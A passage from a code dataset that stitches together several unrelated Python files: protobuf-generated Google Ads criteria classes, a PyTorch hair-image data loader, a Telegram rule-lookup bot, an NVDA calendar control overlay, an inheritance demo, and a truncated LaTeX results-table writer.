_sym_db.RegisterMessage(UserInterestInfo)
WebpageInfo = _reflection.GeneratedProtocolMessageType('WebpageInfo', (_message.Message,), dict(
DESCRIPTOR = _WEBPAGEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Represents a criterion for targeting webpages of an advertiser's
website.
Attributes:
criterion_name:
The name of the criterion that is defined by this parameter.
The name value will be used for identifying, sorting and
filtering criteria with this type of parameters. This field
is required for CREATE operations and is prohibited on UPDATE
operations.
conditions:
Conditions, or logical expressions, for webpage targeting. The
list of webpage targeting conditions are and-ed together when
evaluated for targeting. This field is required for CREATE
operations and is prohibited on UPDATE operations.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.WebpageInfo)
))
_sym_db.RegisterMessage(WebpageInfo)
WebpageConditionInfo = _reflection.GeneratedProtocolMessageType('WebpageConditionInfo', (_message.Message,), dict(
DESCRIPTOR = _WEBPAGECONDITIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Logical expression for targeting webpages of an advertiser's website.
Attributes:
operand:
Operand of webpage targeting condition.
operator:
Operator of webpage targeting condition.
argument:
Argument of webpage targeting condition.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.WebpageConditionInfo)
))
_sym_db.RegisterMessage(WebpageConditionInfo)
OperatingSystemVersionInfo = _reflection.GeneratedProtocolMessageType('OperatingSystemVersionInfo', (_message.Message,), dict(
DESCRIPTOR = _OPERATINGSYSTEMVERSIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Represents an operating system version to be targeted.
Attributes:
operating_system_version_constant:
The operating system version constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.OperatingSystemVersionInfo)
))
_sym_db.RegisterMessage(OperatingSystemVersionInfo)
AppPaymentModelInfo = _reflection.GeneratedProtocolMessageType('AppPaymentModelInfo', (_message.Message,), dict(
DESCRIPTOR = _APPPAYMENTMODELINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """An app payment model criterion.
Attributes:
type:
Type of the app payment model.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.AppPaymentModelInfo)
))
_sym_db.RegisterMessage(AppPaymentModelInfo)
MobileDeviceInfo = _reflection.GeneratedProtocolMessageType('MobileDeviceInfo', (_message.Message,), dict(
DESCRIPTOR = _MOBILEDEVICEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A mobile device criterion.
Attributes:
mobile_device_constant:
The mobile device constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.MobileDeviceInfo)
))
_sym_db.RegisterMessage(MobileDeviceInfo)
CustomAffinityInfo = _reflection.GeneratedProtocolMessageType('CustomAffinityInfo', (_message.Message,), dict(
DESCRIPTOR = _CUSTOMAFFINITYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A custom affinity criterion. A criterion of this type is only
targetable.
Attributes:
custom_affinity:
The CustomInterest resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.CustomAffinityInfo)
))
_sym_db.RegisterMessage(CustomAffinityInfo)
CustomIntentInfo = _reflection.GeneratedProtocolMessageType('CustomIntentInfo', (_message.Message,), dict(
DESCRIPTOR = _CUSTOMINTENTINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A custom intent criterion. A criterion of this type is only targetable.
Attributes:
custom_intent:
The CustomInterest resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.CustomIntentInfo)
))
_sym_db.RegisterMessage(CustomIntentInfo)
LocationGroupInfo = _reflection.GeneratedProtocolMessageType('LocationGroupInfo', (_message.Message,), dict(
DESCRIPTOR = _LOCATIONGROUPINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A radius around a list of locations specified via a feed.
Attributes:
feed:
Feed specifying locations for targeting. This is required and
must be set in CREATE operations.
geo_target_constants:
Geo target constant(s) restricting the scope of the geographic
area within the feed. Currently only one geo target constant
is allowed.
radius:
Distance in units specifying the radius around targeted
locations. This is required and must be set in CREATE
operations.
radius_units:
Unit of the radius, miles and meters supported currently. This
is required and must be set in CREATE operations.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.LocationGroupInfo)
))
_sym_db.RegisterMessage(LocationGroupInfo)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
py | b41065976e261e9ac601e297e370d379f7149b34 | """
Copyright (C) University of Science and Technology of China.
Licensed under the MIT License.
"""
import torch.utils.data as data
from PIL import Image
import torchvision.transforms as transforms
import numpy as np
import random
import torch
import cv2
import matplotlib.pyplot as plt
import torch.nn.functional as F
class BaseDataset(data.Dataset):
def __init__(self):
super(BaseDataset, self).__init__()
@staticmethod
def modify_commandline_options(parser, is_train):
return parser
def initialize(self, opt):
pass
def pad_zeros(input, pad_th):
'''
:param input: type: PIL Image
:param pad_th: int
    :return: PIL Image, the input padded to (H + pad_th, W + pad_th) with the zeros split across both sides
'''
img = np.array(input)
size = img.shape
if len(size) == 2:
H, W = size[0], size[1]
pad_img = np.zeros((H + pad_th, W + pad_th))
pad_img[int(pad_th / 2):int(pad_th / 2) + H, int(pad_th / 2):int(pad_th / 2) + W] = img
else:
H, W, C = size[0], size[1], size[2]
pad_img = np.zeros((H+pad_th, W+pad_th, C))
pad_img[int(pad_th/2):int(pad_th/2)+H, int(pad_th/2):int(pad_th/2)+W, :] = img
pad_img = np.uint8(pad_img)
# plt.imshow(pad_img)
# plt.show()
return Image.fromarray(pad_img)
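# Note on pad_zeros above (comment added for clarity; behaviour read from the
# code, not from project docs): the padding is split evenly, so pad_zeros(img, 32)
# on a 512x512 input yields a 544x544 image with a 16-pixel zero border on every
# side; an odd pad_th gives an uneven split, with the extra row/column on the
# bottom/right because of the int() truncation.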
def single_inference_dataLoad(opt):
base_dir = opt.data_dir
#subset = opt.subset
print('opt:', opt.inference_ref_name, opt.inference_tag_name, opt.inference_orient_name)
label_ref_dir = base_dir + '/' + 'labels/' + opt.inference_ref_name + '.png'
label_tag_dir = base_dir + '/' + 'labels/' + opt.inference_tag_name + '.png'
orient_tag_dir = base_dir + '/' + 'orients/' + opt.inference_tag_name + '_orient_dense.png'
orient_ref_dir = base_dir + '/' + 'orients/' + opt.inference_orient_name + '_orient_dense.png'
orient_mask_dir = base_dir + '/' + 'labels/' + opt.inference_orient_name + '.png'
image_ref_dir = base_dir + '/' + 'images/' + opt.inference_ref_name + '.jpg'
image_tag_dir = base_dir + '/' + 'images/' + opt.inference_tag_name + '.jpg'
label_ref = Image.open(label_ref_dir)
label_tag = Image.open(label_tag_dir)
orient_mask = Image.open(orient_mask_dir)
orient_tag = Image.open(orient_tag_dir)
orient_ref = Image.open(orient_ref_dir)
image_ref = Image.open(image_ref_dir)
image_tag = Image.open(image_tag_dir)
# add zeros
if opt.add_zeros:
label_ref = pad_zeros(label_ref, opt.add_th)
label_tag = pad_zeros(label_tag, opt.add_th)
orient_mask = pad_zeros(orient_mask, opt.add_th)
orient_tag = pad_zeros(orient_tag, opt.add_th)
orient_ref = pad_zeros(orient_ref, opt.add_th)
image_ref = pad_zeros(image_ref, opt.add_th)
image_tag = pad_zeros(image_tag, opt.add_th)
# orient, label = RandomErasure(orient, label)
# label process
params = get_params(opt, label_ref.size)
transform_label = get_transform(opt, params, method=Image.NEAREST, normalize=False)
label_ref_tensor = transform_label(label_ref) * 255.0
label_ref_tensor[label_ref_tensor == 255] = opt.label_nc
label_ref_tensor = torch.unsqueeze(label_ref_tensor, 0)
if opt.expand_tag_mask:
label_tag_array = np.array(label_tag)
di_k = 25
dilate_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (di_k, di_k))
label_tag_array = cv2.dilate(label_tag_array, dilate_kernel)
label_tag = Image.fromarray(np.uint8(label_tag_array)).convert('L')
label_tag_tensor = transform_label(label_tag) * 255.0
label_tag_tensor[label_tag_tensor == 255] = opt.label_nc
label_tag_tensor = torch.unsqueeze(label_tag_tensor, 0)
orient_mask_tensor = transform_label(orient_mask) * 255.0
orient_mask_tensor[orient_mask_tensor == 255] = opt.label_nc
orient_mask_tensor = torch.unsqueeze(orient_mask_tensor, 0)
# if opt.expand_tag_mask:
# k = opt.expand_value
# p = int(k / 2)
# orient_mask_tensor = F.max_pool2d(orient_mask_tensor, kernel_size=k, stride=1, padding=p)
# rgb orientation maps
if opt.use_ig and not opt.no_orientation:
orient_tag_rgb = trans_orient_to_rgb(np.array(orient_ref), np.array(label_tag), np.array(orient_mask))
orient_rgb_tensor = transform_label(orient_tag_rgb)
orient_rgb_tensor = torch.unsqueeze(orient_rgb_tensor, 0)
orient_rgb_tensor = orient_rgb_tensor * label_tag_tensor
else:
orient_rgb_tensor = torch.tensor(0)
# hole mask
if opt.use_ig:
if opt.inference_orient_name == opt.inference_tag_name:
hole = np.array(label_tag)
hole = generate_hole(hole, np.array(orient_mask))
hole_tensor = transform_label(hole) * 255.0
hole_tensor = torch.unsqueeze(hole_tensor, 0)
else:
hole_tensor = label_tag_tensor - orient_mask_tensor * label_tag_tensor
else:
hole_tensor = torch.tensor(0)
# generate noise
noise = generate_noise(opt.crop_size, opt.crop_size)
noise_tensor = torch.tensor(noise).permute(2, 0, 1)
noise_tensor = torch.unsqueeze(noise_tensor, 0)
image_ref = image_ref.convert('RGB')
if opt.color_jitter:
transform_image = get_transform(opt, params, color=True)
else:
transform_image = get_transform(opt, params)
image_ref_tensor = transform_image(image_ref)
image_ref_tensor = torch.unsqueeze(image_ref_tensor, 0)
image_tag = image_tag.convert('RGB')
transform_image = get_transform(opt, params)
image_tag_tensor = transform_image(image_tag)
image_tag_tensor = torch.unsqueeze(image_tag_tensor, 0)
orient_tensor = transform_label(orient_tag) * 255
orient_tensor = torch.unsqueeze(orient_tensor, 0)
data = {'label_ref': label_ref_tensor,
'label_tag': label_tag_tensor,
'instance': torch.tensor(0),
'image_ref': image_ref_tensor,
'image_tag': image_tag_tensor,
'path': image_tag_dir,
'orient': orient_tensor,
'hole': hole_tensor,
'orient_rgb': orient_rgb_tensor,
'noise': noise_tensor
}
return data
def demo_inference_dataLoad(opt, ref_label_dir, tag_label, mask_orient, ref_orient, ref_image, tag_image, orient_stroke=None, mask_stroke=None, mask_hole=None):
'''
    :param opt: parsed options (preprocessing settings, label_nc, expand_tag_mask, color_jitter, crop_size, ...)
    :param ref_label_dir: path to the reference label image, opened with PIL
    :param tag_label: type: np.array, target label mask
    :param mask_orient: type: np.array, mask matching ref_orient
    :param ref_orient: type: np.array, dense orientation map of the reference, range: [0, 255]
    :param ref_image: type: PIL Image, reference RGB image
    :param tag_image: type: PIL Image, target RGB image
:param orient_stroke: type: np.array, shape: 512*512*3, range: [0, 255]
:param mask_stroke: type: np.array, range: {0, 1}, shape: 512*512
:param mask_hole: type: np.array, range: {0, 1}, shape: 512*512
    :return: dict of batched tensors (labels, images, orientation maps, masks, noise)
'''
label_ref = Image.open(ref_label_dir)
label_tag = Image.fromarray(np.uint8(tag_label))
orient_mask = Image.fromarray(np.uint8(mask_orient))
orient_ref = Image.fromarray(np.uint8(ref_orient))
image_ref = ref_image
image_tag = tag_image
# orient, label = RandomErasure(orient, label)
# label process
params = get_params(opt, label_ref.size)
transform_label = get_transform(opt, params, method=Image.NEAREST, normalize=False)
label_ref_tensor = transform_label(label_ref) * 255.0
label_ref_tensor[label_ref_tensor == 255] = opt.label_nc
label_ref_tensor = torch.unsqueeze(label_ref_tensor, 0)
if opt.expand_tag_mask:
label_tag_array = np.array(label_tag)
di_k = 25
dilate_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (di_k, di_k))
label_tag_array = cv2.dilate(label_tag_array, dilate_kernel)
label_tag = Image.fromarray(np.uint8(label_tag_array)).convert('L')
label_tag_tensor = transform_label(label_tag) * 255.0
label_tag_tensor[label_tag_tensor == 255] = opt.label_nc
label_tag_tensor = torch.unsqueeze(label_tag_tensor, 0)
orient_mask_tensor = transform_label(orient_mask) * 255.0
orient_mask_tensor[orient_mask_tensor == 255] = opt.label_nc
orient_mask_tensor = torch.unsqueeze(orient_mask_tensor, 0)
# rgb orientation maps
orient_tag_rgb = trans_orient_to_rgb(np.array(orient_ref), np.array(label_tag), np.array(orient_mask))
orient_rgb_tensor = transform_label(orient_tag_rgb)
orient_rgb_tensor = torch.unsqueeze(orient_rgb_tensor, 0)
orient_rgb_tensor = orient_rgb_tensor * label_tag_tensor
orient_rgb_mask = orient_mask_tensor * label_tag_tensor
# hole mask
if mask_hole is None:
hole_tensor = label_tag_tensor - orient_mask_tensor * label_tag_tensor
else:
mask_hole_img = Image.fromarray(np.uint8(mask_hole))
hole_tensor = transform_label(mask_hole_img) * 255.0
hole_tensor = torch.unsqueeze(hole_tensor, 0) * label_tag_tensor
# orient_stroke
if orient_stroke is not None:
orient_stroke_img = Image.fromarray(np.uint8(orient_stroke))
# orient_stroke_img.save('./inference_samples/orient_stroke.png')
orient_stroke_tensor = transform_label(orient_stroke_img)
orient_stroke_tensor = torch.unsqueeze(orient_stroke_tensor, 0)
orient_stroke_tensor = orient_stroke_tensor * label_tag_tensor
else:
orient_stroke_tensor = torch.tensor(0)
# mask_stroke
if mask_stroke is not None:
mask_stroke_img = Image.fromarray(np.uint8(mask_stroke))
mask_stroke_tensor = transform_label(mask_stroke_img) * 255.0
mask_stroke_tensor = torch.unsqueeze(mask_stroke_tensor, 0) * label_tag_tensor
else:
mask_stroke_tensor = torch.tensor(0)
# generate noise
noise = generate_noise(opt.crop_size, opt.crop_size)
noise_tensor = torch.tensor(noise).permute(2, 0, 1)
noise_tensor = torch.unsqueeze(noise_tensor, 0)
image_ref = image_ref.convert('RGB')
if opt.color_jitter:
transform_image = get_transform(opt, params, color=True)
else:
transform_image = get_transform(opt, params)
image_ref_tensor = transform_image(image_ref)
image_ref_tensor = torch.unsqueeze(image_ref_tensor, 0)
image_tag = image_tag.convert('RGB')
transform_image = get_transform(opt, params)
image_tag_tensor = transform_image(image_tag)
image_tag_tensor = torch.unsqueeze(image_tag_tensor, 0)
#
orient_tensor = transform_label(orient_ref) * 255
orient_tensor = torch.unsqueeze(orient_tensor, 0)
data = {'label_ref': label_ref_tensor,
'label_tag': label_tag_tensor,
'instance': torch.tensor(0),
'image_ref': image_ref_tensor,
'image_tag': image_tag_tensor,
'path': None,
'orient': orient_tensor,
'hole': hole_tensor,
'orient_rgb': orient_rgb_tensor,
'orient_rgb_mask': orient_rgb_mask,
'noise': noise_tensor,
'orient_stroke': orient_stroke_tensor,
'mask_stroke': mask_stroke_tensor
}
return data
def show_training_data(data):
noise = data['noise']
orient_rgb = data['orient_rgb']
hole = data['hole']
image_ref = data['image_ref']
image_tag = data['image_tag']
    # convert to numpy; noise and orient_rgb are already in the range [0, 1]
noise = noise.permute(1,2,0).numpy()
orient_rgb = orient_rgb.permute(1,2,0).numpy()
hole = hole.permute(1,2,0).numpy()
image_ref = (image_ref.permute(1,2,0).numpy() + 1) / 2
image_tag = (image_tag.permute(1, 2, 0).numpy() + 1) / 2
orient_noise = orient_rgb * (1 - hole) + noise * hole
# plt
plt.subplot(2,2,1)
plt.imshow(orient_rgb)
plt.subplot(2,2,2)
plt.imshow(orient_noise)
plt.subplot(2,2,3)
plt.imshow(image_ref)
plt.subplot(2,2,4)
plt.imshow(image_tag)
plt.show()
def RandomErasure(orient, label):
import math
orient_array = np.array(orient)
H, W = orient_array.shape
if abs(orient_array).max() == 0:
return orient, label
else:
coord = np.where(orient_array != 0)
nums = len(coord[0])
th = random.uniform(0.3, 1.5)
crop_nums = int(th * nums)
rr = int(crop_nums / math.pi)
center_idx = random.randint(0, nums-1)
center_h = coord[0][center_idx]
center_w = coord[1][center_idx]
tmp_h = np.array(range(H))
tmp_h = tmp_h.repeat(W).reshape(H, W)
tmp_w = np.array(range(W))
tmp_w = np.tile(tmp_w, H).reshape(H, W)
mask = ((tmp_h - center_h) ** 2 + (tmp_w - center_w) ** 2) < rr
        mask = mask.astype(float)  # builtin float; the np.float alias was removed in newer NumPy
orient_array = orient_array * (1-mask)
orient_array = Image.fromarray(np.uint8(orient_array))
label_array = np.array(label) * (1-mask)
label_array = Image.fromarray(np.uint8(label_array))
return orient_array, label_array
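# Note on generate_hole below (derived from the code, not from any project docs):
# the disc test `dist**2 < rr` with rr = crop_nums / pi describes a disc of area
# roughly crop_nums, i.e. about th (0.5-1.2) times the number of non-zero
# orientation pixels. The returned hole is that disc intersected with
# orient_mask, plus whatever part of `mask` lies outside orient_mask.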
def generate_hole(mask, orient_mask):
import math
H, W = orient_mask.shape
if abs(orient_mask).max() == 0:
return Image.fromarray(np.uint8(orient_mask)).convert('L')
else:
coord = np.where(orient_mask != 0)
nums = len(coord[0])
th = random.uniform(0.5, 1.2)
crop_nums = int(th * nums)
rr = int(crop_nums / math.pi)
center_idx = random.randint(0, nums-1)
center_h = coord[0][center_idx]
center_w = coord[1][center_idx]
tmp_h = np.array(range(H))
tmp_h = tmp_h.repeat(W).reshape(H, W)
tmp_w = np.array(range(W))
tmp_w = np.tile(tmp_w, H).reshape(H, W)
tmp_mask = ((tmp_h - center_h) ** 2 + (tmp_w - center_w) ** 2) < rr
        tmp_mask = tmp_mask.astype(float)  # builtin float; the np.float alias was removed in newer NumPy
hole_mask = orient_mask * tmp_mask + (mask - orient_mask)
hole = Image.fromarray(np.uint8(hole_mask)).convert('L')
return hole
def trans_orient_to_rgb(orient, label, orient_label=None):
import math
# orient is the dense orient map which ranges from 0 to 255, orient_label is the mask which matches the orient
# if orient_label is None, that means label matches the orient
orient_mask = orient / 255.0 * math.pi
H, W = orient_mask.shape
orient_rgb = np.zeros((H, W, 3))
orient_rgb[..., 1] = (np.sin(2 * orient_mask)+1)/2
orient_rgb[..., 0] = (np.cos(2 * orient_mask)+1)/2
orient_rgb[...,2] = 0.5
if orient_label is None:
orient_rgb *= label[...,np.newaxis]
orient_rgb = orient_rgb * 255.0
orient_rgb = Image.fromarray(np.uint8(orient_rgb)).convert('RGB')
# orient_rgb.save('./inference_samples/orient_before_trans.png')
return orient_rgb
else:
orient_rgb *= orient_label[..., np.newaxis]
orient_rgb = orient_rgb * 255.0
orient_rgb = Image.fromarray(np.uint8(orient_rgb)).convert('RGB')
# orient_rgb.save('./inference_samples/orient_before_trans.png')
return orient_rgb
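# Worked example of the encoding in trans_orient_to_rgb above (derived from the
# formulas, not from any external reference): a dense orientation value v is
# mapped to theta = v / 255 * pi and then to
#     R = (cos(2*theta) + 1) / 2,   G = (sin(2*theta) + 1) / 2,   B = 0.5,
# scaled by 255. So v = 0 (theta = 0) encodes to roughly (255, 128, 128) and
# v = 127 (theta close to pi/2) to roughly (0, 128, 128); the doubled angle makes
# 0 and pi encode to the same colour, as expected for orientations defined
# modulo pi.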
def generate_noise(width, height):
weight = 1.0
weightSum = 0.0
noise = np.zeros((height, width, 3)).astype(np.float32)
while width >= 8 and height >= 8:
        # cv2.resize takes dsize as (width, height); using (shape[1], shape[0]) keeps
        # the upsampled octave the same shape as the accumulator even when
        # width != height (the original argument order only worked for square sizes).
        noise += cv2.resize(np.random.normal(loc=0.5, scale=0.25, size=(int(height), int(width), 3)),
                            dsize=(noise.shape[1], noise.shape[0])) * weight
weightSum += weight
width //= 2
height //= 2
return noise / weightSum
def get_params(opt, size):
w, h = size
new_h = h
new_w = w
if opt.preprocess_mode == 'resize_and_crop':
new_h = new_w = opt.load_size
elif opt.preprocess_mode == 'scale_width_and_crop':
new_w = opt.load_size
new_h = opt.load_size * h // w
elif opt.preprocess_mode == 'scale_shortside_and_crop':
ss, ls = min(w, h), max(w, h) # shortside and longside
width_is_shorter = w == ss
ls = int(opt.load_size * ls / ss)
new_w, new_h = (ss, ls) if width_is_shorter else (ls, ss)
x = random.randint(0, np.maximum(0, new_w - opt.crop_size))
y = random.randint(0, np.maximum(0, new_h - opt.crop_size))
flip = random.random() > 0.5
return {'crop_pos': (x, y), 'flip': flip}
def get_transform(opt, params, method=Image.BICUBIC, normalize=True, toTensor=True, color=False):
transform_list = []
if 'resize' in opt.preprocess_mode:
osize = [opt.load_size, opt.load_size]
transform_list.append(transforms.Resize(osize, interpolation=method))
elif 'scale_width' in opt.preprocess_mode:
transform_list.append(transforms.Lambda(lambda img: __scale_width(img, opt.load_size, method)))
elif 'scale_shortside' in opt.preprocess_mode:
transform_list.append(transforms.Lambda(lambda img: __scale_shortside(img, opt.load_size, method)))
if 'crop' in opt.preprocess_mode:
transform_list.append(transforms.Lambda(lambda img: __crop(img, params['crop_pos'], opt.crop_size)))
if opt.preprocess_mode == 'none':
base = 32
transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base, method)))
if opt.preprocess_mode == 'fixed':
w = opt.crop_size
h = round(opt.crop_size / opt.aspect_ratio)
transform_list.append(transforms.Lambda(lambda img: __resize(img, w, h, method)))
if opt.isTrain and not opt.no_flip:
transform_list.append(transforms.Lambda(lambda img: __flip(img, params['flip'])))
if color:
transform_list += [transforms.ColorJitter(brightness=0.1, contrast=0.01, saturation=0.01, hue=0.01)]
if toTensor:
transform_list += [transforms.ToTensor()]
if normalize:
transform_list += [transforms.Normalize((0.5, 0.5, 0.5),
(0.5, 0.5, 0.5))]
return transforms.Compose(transform_list)
def normalize():
return transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
def __resize(img, w, h, method=Image.BICUBIC):
return img.resize((w, h), method)
def __make_power_2(img, base, method=Image.BICUBIC):
ow, oh = img.size
h = int(round(oh / base) * base)
w = int(round(ow / base) * base)
if (h == oh) and (w == ow):
return img
return img.resize((w, h), method)
def __scale_width(img, target_width, method=Image.BICUBIC):
ow, oh = img.size
if (ow == target_width):
return img
w = target_width
h = int(target_width * oh / ow)
return img.resize((w, h), method)
def __scale_shortside(img, target_width, method=Image.BICUBIC):
ow, oh = img.size
ss, ls = min(ow, oh), max(ow, oh) # shortside and longside
width_is_shorter = ow == ss
if (ss == target_width):
return img
ls = int(target_width * ls / ss)
nw, nh = (ss, ls) if width_is_shorter else (ls, ss)
return img.resize((nw, nh), method)
def __crop(img, pos, size):
ow, oh = img.size
x1, y1 = pos
tw = th = size
return img.crop((x1, y1, x1 + tw, y1 + th))
def __flip(img, flip):
if flip:
return img.transpose(Image.FLIP_LEFT_RIGHT)
return img
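if __name__ == "__main__":
    # Hedged, self-contained sketch of how get_params/get_transform fit together
    # outside the real dataloaders. The option values below are assumptions made
    # only so the snippet runs on its own; real values come from the project's
    # option parser.
    from types import SimpleNamespace
    _opt = SimpleNamespace(preprocess_mode='resize_and_crop', load_size=286,
                           crop_size=256, isTrain=False, no_flip=True)
    _img = Image.fromarray(np.zeros((300, 400, 3), dtype=np.uint8))
    _params = get_params(_opt, _img.size)
    _tensor = get_transform(_opt, _params)(_img)
    print(_tensor.shape)  # expected: torch.Size([3, 256, 256])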
|
py | b41066bf007954f91fd0eeca9c233e79662d24a9 | import json
import os
import sys
here = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(here, "./vendored"))
import requests
TOKEN = os.environ['TELEGRAM_TOKEN']
BASE_URL = f"https://api.telegram.org/bot{TOKEN}"
def manualLoad(headersfilename='headers.txt'):
unorderedlist = []
with open(headersfilename, "r") as f:
unorderedlist = f.read().splitlines()
datadict = {}
for i in range(len(unorderedlist)):
datadict[i+1] = unorderedlist[i]
return datadict
def hello(event, context):
try:
data = json.loads(event["body"])
message = str(data["message"]["text"]).strip('/')
chat_id = data["message"]["chat"]["id"]
response = f"Enter rule number:"
try:
num = int(message)
datadict = manualLoad()
if num in datadict:
response = f"RULE #{num} // {datadict[num]}"
else:
response = "No such rule number."
except ValueError as ve:
print(ve)
data = {"text": response.encode("utf8"), "chat_id": chat_id}
url = f"{BASE_URL}/sendMessage"
requests.post(url, data)
except Exception as e:
print(e)
return {"statusCode": 200} |
py | b4106776cf050126f4ea834feeaaca94c3f81f15 | #NVDAObjects/IAccessible/SysMonthCal32.py
#A part of NonVisual Desktop Access (NVDA)
#Copyright (C) 2006-2007 NVDA Contributors <http://www.nvda-project.org/>
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
import controlTypes
from . import IAccessible
class SysMonthCal32(IAccessible):
def _get_role(self):
return controlTypes.ROLE_CALENDAR
def _get_name(self):
return ""
def _get_value(self):
return super(SysMonthCal32,self).name
def script_valueChange(self,gesture):
gesture.send()
self.event_valueChange()
__valueChangeGestures = (
"kb:upArrow",
"kb:downArrow",
"kb:leftArrow",
"kb:rightArrow",
"kb:home",
"kb:end",
"kb:control+home",
"kb:control+end",
"kb:pageDown",
"kb:pageUp",
)
def initOverlayClass(self):
for gesture in self.__valueChangeGestures:
self.bindGesture(gesture, "valueChange")
|
py | b41068198356f64db15e5db1be9c28357a061837 | # A Python program to demonstrate inheritance
# Base or Super class. Note object in bracket.
# (Generally, object is made ancestor of all classes)
# In Python 3.x "class Base" is
# equivalent to "class Base(object)"
class Base(object):
# Constructor
def __init__(self, name):
self.name = name
# To get name
def getName(self):
return self.name
# Inherited or Sub class (Note Base in bracket)
class Child(Base):
# Constructor
def __init__(self, name, age):
Base.__init__(self, name)
self.age = age
    # To get age
def getAge(self):
return self.age
# Inherited or Sub class (Note Child in bracket)
class GrandChild(Child):
# Constructor
def __init__(self, name, age, address):
Child.__init__(self, name, age)
self.address = address
# To get address
def getAddress(self):
return self.address
# Driver code
g = GrandChild("Geek1", 23, "Noida")
print(g.getName(), g.getAge(), g.getAddress())
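# A hedged variant (not part of the original snippet): the same subclass written
# with super(), the more idiomatic Python 3 spelling, which avoids repeating the
# base-class name in every constructor.
class ChildWithSuper(Base):
    # Constructor using a cooperative call up the MRO instead of Base.__init__
    def __init__(self, name, age):
        super().__init__(name)
        self.age = age
    # To get age
    def getAge(self):
        return self.age
print(ChildWithSuper("Geek2", 25).getAge())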
|
py | b41068afafdcae21eebcc9f5aece429a167b6a80 | #!/usr/bin/env python
import os
from evaluation.tools.math_utils import locate_min
from evo.core import result
import glog as log
def write_latex_table_header(cols_names_list, sub_cols_names_list):
""" If you don't want sub_cols in the table just set it to 1.
cols_names_list: List of names of the columns, typically pipeline names (S, SP, SPR, ...).
sub_cols_names_list: List of names of the sub-columns, typically metrics names (Median, RMSE, Drift, ...).
"""
assert(type(cols_names_list) == list)
assert(type(sub_cols_names_list) == list)
cols = len(cols_names_list)
sub_cols = len(sub_cols_names_list)
start_line = """\\begin{table*}[h]
\\centering
\\caption{Accuracy of the State Estimation}
\\label{tab:accuracy_comparison}
\\begin{tabularx}{\\textwidth}{l *%s{Y}}
\\toprule
& \\multicolumn{%s}{c}{APE Translation} \\\\
\\cmidrule{2-%s}
"""%(cols * sub_cols, cols * sub_cols, cols * sub_cols + 1)
cols_header_line=""
if sub_cols <= 1:
cols_header_line = """Sequence """
mid_rule_line=""
col_counter = 0
for col_name in cols_names_list:
if sub_cols > 1:
cols_header_line = cols_header_line + """& \\multicolumn{%s}{c}{\\textbf{%s}} """%(sub_cols, col_name)
mid_rule_line = mid_rule_line + """\\cmidrule(r){%s-%s}"""%(col_counter, col_counter + sub_cols)
else:
cols_header_line = cols_header_line + """& \\textbf{%s} """%(col_name)
col_counter = col_counter + sub_cols
break_row = """ \\\\"""
sub_cols_header_line = ""
if sub_cols > 1:
sub_cols_header_line = """Sequence """
for col_name in cols_names_list:
for sub_col_name in sub_cols_names_list:
sub_cols_header_line = sub_cols_header_line + """& %s """ % (sub_col_name)
start_line = start_line + cols_header_line + break_row + "\n" + sub_cols_header_line + break_row + "\n \\midrule \n"
return start_line
def write_latex_table(stats, results_dir):
""" Write latex table with median, mean and rmse from stats:
which is a list that contains:
- dataset name (string) (like V1_01_easy, MH_01_easy etc):
- pipeline type (string) (like S, SP or SPR):
- "absolute_errors":
- "max"
- "min"
- "mean"
- "median"
- "q1"
- "q3"
- "rmse"
- "trajectory_length_m"
"""
# Assumes an equal number of cols/keys per row
cols_names_list = list(sorted(stats[list(stats.keys())[0]].keys()))
sub_cols_names_list = ["Median [cm]", "RMSE [cm]", "Drift [\\%]"]
start_line = write_latex_table_header(cols_names_list, sub_cols_names_list)
end_line = """
\\bottomrule
\\end{tabularx}%
\\end{table*}{}
"""
bold_in = '& \\textbf{'
bold_out = '} '
end = '\\\\\n'
all_lines = start_line
winners = dict()
for dataset_name, pipeline_types in sorted(stats.items()):
median_error_pos = []
# mean_error_pos = []
rmse_error_pos = []
drift = []
i = 0
for pipeline_type, pipeline_stats in sorted(pipeline_types.items()):
assert(cols_names_list[i] == pipeline_type) # Ensure col names and results are consistent!
i += 1
assert(isinstance(pipeline_stats["absolute_errors"], result.Result))
# if pipeline_type is not "S": # Ignore S pipeline
median_error_pos.append(pipeline_stats["absolute_errors"].stats["median"])
# mean_error_pos.append(pipeline_stats["absolute_errors"]["mean"])
rmse = pipeline_stats["absolute_errors"].stats["rmse"]
rmse_error_pos.append(rmse)
assert(pipeline_stats["trajectory_length_m"] > 0)
            # THIS IS NOT ACTUALLY DRIFT: trajectory_length_m is the length of the
            # estimated trajectory, not the ground-truth one.
drift.append(rmse / pipeline_stats["trajectory_length_m"])
log.error("DRIFT IS: %f"%(rmse / pipeline_stats["trajectory_length_m"]))
# Find winning pipeline
_, median_idx_min = locate_min(median_error_pos)
# _, mean_idx_min = locate_min(mean_error_pos)
_, rmse_idx_min = locate_min(rmse_error_pos)
_, drift_idx_min = locate_min(drift)
# Store winning pipeline
winners[dataset_name] = [median_idx_min,
# mean_idx_min,
rmse_idx_min,
drift_idx_min]
for dataset_name, pipeline_types in sorted(stats.items()):
